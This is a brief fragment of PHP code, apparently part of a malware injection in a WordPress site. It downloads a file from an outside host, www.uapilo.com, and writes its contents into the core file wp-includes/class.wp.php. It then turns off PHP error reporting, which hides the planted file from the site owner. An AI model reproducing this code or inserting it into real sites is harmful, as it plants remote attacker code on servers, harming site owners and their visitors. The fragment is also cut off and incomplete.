'wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } ?><?php error_reporting(0);?>